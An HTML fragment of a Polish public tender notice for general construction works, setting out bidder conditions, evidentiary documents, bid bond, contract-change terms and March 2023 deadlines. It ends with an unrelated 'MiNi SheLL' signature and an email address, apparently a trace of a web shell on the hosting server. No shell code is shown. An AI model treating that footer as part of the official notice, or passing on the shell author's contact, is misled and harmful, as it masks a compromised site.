109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące: <br/>a)	zdolności do występowania w obrocie gospodarczym<br/>Zamawiający nie precyzuje warunku udziału w postępowaniu.<br/>b)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej<br/>Zamawiający nie precyzuje warunku udziału w postępowaniu.<br/>c)	zdolności ekonomicznej lub finansowej<br/>Zamawiający nie precyzuje warunku udziału w postępowaniu.<br/>d)	zdolności technicznej lub zawodowej: niezbędnej do należytego wykonania zamówienia tj., jeżeli Wykonawca wykaże, że w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeśli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał w sposób należyty:<br/>co najmniej dwie roboty ogólnobudowlane (umowy), każda o wartości brutto nie mniejszej niż 800 000,00 zł. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający przed wyborem najkorzystniejszej oferty wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, aktualnych na dzień złożenia następujących podmiotowych środków dowodowych:<br/>1)	odpisu lub informacji z Krajowego Rejestru Sądowego lub Centralnej ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust 1 pkt 4 ustawy Pzp, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestracji lub ewidencji; lub Zamawiający nie wezwie, jeśli uzyska je za pomocą bezpłatnych <br/>i ogólnodostępnych baz danych w szczególności rejestrów publicznych;<br/>2)	jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej, zamiast dokumentu, o którym mowa w pkt 1, dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej <br/>z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury. Dokument, o którym mowa powyżej, powinien być wystawiony nie wcześniej niż 3 miesiące przed jego złożeniem.<br/>3)	Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt 2, zastępuje się je odpowiednio w całości lub w części dokumentem zawierającym odpowiednio oświadczenie Wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone pod przysięgą, lub, jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania nie ma przepisów o oświadczeniu pod przysięgą, złożone przed organem sądowym lub administracyjnym, notariuszem, organem samorządu zawodowego lub gospodarczego, właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy. Dokument powinien być wystawiony odpowiednio jak w terminie wskazanym w pkt 2. <br/>4)	Do podmiotów udostępniających zasoby na zasadach określonych w art. 118 ustawy oraz podwykonawców niebędących podmiotami udostępniającymi zasoby na tych zasadach, mających siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przepisy pkt 2) i 3) stosuje się odpowiednio.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający przed wyborem najkorzystniejszej oferty wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, aktualnych na dzień złożenia następujących podmiotowych środków dowodowych:<br/>1)	wykazu robót budowlanych potwierdzających spełnianie warunków udziału w postępowaniu, o których mowa w Rozdziale VIII ust. 1 pkt 2) lit. d SWZ, tj. potwierdzających wykonanie:<br/>– co najmniej dwóch robót ogólnobudowlanych (umów), każda o wartości brutto nie mniejszej niż 800 000,00 zł;<br/>wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania <br/>i podmiotów, na rzecz których roboty te zostały wykonane wraz <br/>z załączeniem dowodów, określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone. <br/>Wzór wykazu stanowi załącznik 5 do SWZ. <br/>UWAGA: <br/>•	w przypadku, gdy Wykonawca wykonywał roboty budowlane wspólnie z innym Wykonawcą (np. w ramach konsorcjum) <br/>w zakresie wykazania spełnienia powyższego warunku udziału <br/>w postępowaniu może powołać się tylko na te roboty, które wykonywał samodzielnie. Nie może powoływać się na roboty, które faktycznie nie były przez niego wykonywane.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1. W przypadku jeżeli Wykonawca przewiduje zastosowanie rozwiązań równoważnych, Zamawiający wymaga złożenia wraz<br/>z ofertą środków dowodowych, jakimi Wykonawca udowodni, że oferowane rozwiązanie jest równoważne rozwiązaniom<br/>opisanym w SWZ. Zamawiający nie ogranicza rodzaju tych środków dowodowych. W szczególności mogą to być wybrane<br/>przez Wykonawcę przedmiotowe środki dowodowe, o których mowa<br/>w art. 104, 105 i 106 ustawy Pzp, w tym określonych w Rozdziale IV ust. 5 niniejszej SWZ.<br/>2. Jeżeli Wykonawca nie złoży przedmiotowych środków dowodowych lub złożone przedmiotowe środki dowodowe będą<br/>niekompletne, Zamawiający wezwie do ich złożenia lub uzupełnienia w wyznaczonym terminie. Zamawiający może żądać<br/>od wykonawców wyjaśnień dotyczących treści przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Zamawiający nie ogranicza rodzaju przedmiotowych środków dowodowych. W szczególności mogą to być wybrane przez<br/>Wykonawcę przedmiotowe środki dowodowe, o których mowa w art. 104, 105 i 106 ustawy Pzp, w tym określonych w<br/>Rozdziale IV ust. 5 SWZ. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Zgodnie z art. 117 ust. 4 ustawy Pzp w przypadku, o którym mowa w Rozdziale VIII ust. 1 pkt 2), Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane wykonają poszczególni Wykonawcy (wzór - załącznik nr 6 do SWZ).<br/>2. Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby, składa, wraz z ofertą,<br/>zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji<br/>danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie<br/>dysponował niezbędnymi zasobami tych podmiotów. Wzór zobowiązania stanowi załącznik nr 7 do SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Przystępując do postępowania Wykonawca zobowiązany jest do wniesienia wadium w wysokości: 14 600,00 PLN,<br/>Wadium musi być wniesione przed upływem terminu składania ofert i utrzymane nieprzerwanie do dnia upływu terminu<br/>związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.W przypadku Wykonawców wspólnie ubiegających się o udzielnie zamówienia:1) W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych Wykonawców, którzy wykonują roboty budowlane lub usługi do realizacji, których, te zdolności są wymagane. <br/>2.W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oświadczenie, stanowiące załącznik nr 3<br/>do SWZ, składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Dokumenty te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu.<br/>3. Zgodnie z art. 117 ust. 4 ustawy Pzp w przypadku, o którym mowa w Rozdziale VIII ust. 1 pkt 2), Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane wykonają poszczególni Wykonawcy (wzór - załącznik nr 6 do SWZ).<br/>4.W przypadku wadium wnoszonego w formie innej niż pieniądz przez jednego z uczestników Konsorcjum w treści dokumentu wadialnego musi być wyszczególniony pełen skład Konsorcjum.<br/>5 . W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, do oferty należy dołączyć pełnomocnictwo podpisane elektronicznym podpisem, kwalifikowanym, podpisem zaufanym lub podpisem osobistym przez uprawnionych przedstawicieli pozostałych Wykonawców, upoważniające jednego z Wykonawców do reprezentowania pozostałych.<br/>6. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego, których oferta zostanie uznana za najkorzystniejszą, przedłożą umowę regulującą współpracę tych Wykonawców, w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę lub osoby uprawnione do reprezentowania Wykonawcy.<br/>7. W przypadku wyboru oferty złożonej przez Wykonawców składających ofertę wspólnie należy przedłożyć polisę<br/>ubezpieczeniową lub inny dokument ubezpieczenia zawierający rozszerzenie obejmujące każdego z Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zamawiający przewiduje zmiany postanowień umowy (również terminu), w szczególności:<br/>1) zaistnienia okoliczności, o których mowa w art. 455 ustawy Pzp.<br/>2) zmiany terminu realizacji umowy w sytuacji, gdy nw. okoliczności uniemożliwią realizację przedmiotu umowy:<br/>a) panujące warunki atmosferyczne np. opady deszczu, śniegu lub gradu, silne wiatry, ekstremalne upały lub mrozy trwające, co najmniej 10% dni przewidzianych na realizację zamówienia wynikających z § 2 projektowanych postanowień umowy. Wystąpienie<br/>powyższego musi być przez Wykonawcę udokumentowane<br/>(np. dołączenie do wniosku potwierdzenia przez odpowiedni instytut meteorologiczny a w przypadku niemożliwości<br/>uzyskania takiego dokumentu, odpowiednie zapisy w dzienniku budowy lub innym dokumencie potwierdzone przez przedstawiciela Zamawiającego),<br/>b) wystąpienie klęsk żywiołowych lub stanu epidemicznego uniemożliwiających realizację robót,<br/>c) uwarunkowań technologicznych zależnych od warunków rzeczywistych stwierdzonych w trakcie wykonywania robót,<br/>d) zwiększenia lub zmiany zakresu robót potwierdzonego protokołem konieczności na roboty dodatkowe lub zamienne,<br/>jeżeli roboty te mają wpływ na termin wykonania niniejszej umowy,<br/>e) wykrycia na terenie budowy broni, bomb, niewybuchów lub innych materiałów wybuchowych, szczątków ludzkich oraz przedmiotów<br/>o znaczeniu archeologicznym lub/i historycznym,<br/>f) odmienne od przyjętych w opisie przedmiotu zamówienia stanowiącym załącznik nr 1 do umowy warunki wykonania przedmioty umowy,<br/>w szczególności wykrycie niezinwentaryzowanych lub błędnie zinwentaryzowanych elementów budowlanych, instalacji lub<br/>urządzeń wymagających przebudowy w związku z wykonaniem umowy,<br/>g) nastąpi wstrzymanie robót przez Zamawiającego lub uprawniony organ z przyczyn niewynikających z winy Wykonawcy,<br/>h) organ administracji lub inne podmioty odmówią wydania wymaganych decyzji, zezwoleń, uzgodnień z przyczyn niezawinionych przez Wykonawcę,<br/>w przypadku wystąpienia którejkolwiek z okoliczności wymienionych<br/>w pkt. 2 lit a) – h), termin wykonania umowy może ulec przedłużeniu<br/>o czas niezbędny do zakończenia wykonywania jej przedmiotu w sposób należyty, nie dłużej jednak niż o okres trwania tych okoliczności.<br/>Zmiana terminu wymaga wystąpienia Wykonawcy ze stosownym wnioskiem<br/>w formie pisemnej nie później niż na 7 dni przed upływem pierwotnego terminu zakończenia realizacji umowy, o którym<br/>mowa w § 2 ust. 1 projektowanych postanowień umowy.<br/>Powinien on zawierać prośbę o zmianę postanowień umowy wraz<br/>z uzasadnieniem faktycznym i prawnym oraz określenie zakresu tej zmiany (ilość dni, termin), która ma nastąpić. Wnioski<br/>złożone po tym terminie nie zostaną rozpatrzone.<br/>3) zmiana lub wprowadzenie podwykonawcy, z zastrzeżeniem postanowień § 8 projektowanych postanowień umowy:<br/>a) zmiana lub wprowadzenie albo rezygnacja z podwykonawcy, który<br/>nie występuje jednocześnie, jako inny podmiot w celu wykazania spełniania warunków udziału w postępowaniu,<br/>b) jeżeli zmiana albo rezygnacja z podwykonawcy dotyczy podmiotu,<br/>na którego zasoby Wykonawca powoływał się, w celu wykazania spełniania warunków udziału w postępowaniu, Wykonawca jest obowiązany wykazać Zamawiającemu, że proponowany inny podwykonawca lub Wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż podwykonawca,<br/>na którego zasoby Wykonawca powoływał się w trakcie postępowania<br/>o udzielenie zamówienia,<br/>c) jeżeli powierzenie podwykonawcy wykonania części zamówienia na roboty budowlane następuje w trakcie jego realizacji,<br/>Wykonawca na żądanie Zamawiającego przedstawia oświadczenie, lub oświadczenia lub dokumenty potwierdzające brak<br/>podstaw wykluczenia wobec tego podwykonawcy,<br/>4) zmiany wysokości wynagrodzenia w sytuacji, gdy nastąpi urzędowa zmiana stawki podatku VAT;<br/>5) zmiana wysokości wynagrodzenia w sytuacji wystąpienia okoliczności opisanych w § 14 projektowanych postanowieniach umowy;<br/>6) zmiany sposobu spełniania świadczenia w sytuacji, gdy nastąpi zmiana przepisów prawnych mających wpływ nawykonanie przedmiotu umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-03-23 08:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://portal.smartpzp.pl/21wog</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-03-23 09:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-04-21</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Wymagany termin wykonania zamówienia:<br/>do 120 dni kalendarzowych od dnia przekazania placu budowy.<br/><br/>Zamawiający informuje, że z postępowania o udzielenie zamówienia wykluczy Wykonawcę na podstawie przesłanek<br/>opisanych w przepisie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie<br/>przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego.

Creat By MiNi SheLL
Email: jattceo@gmail.com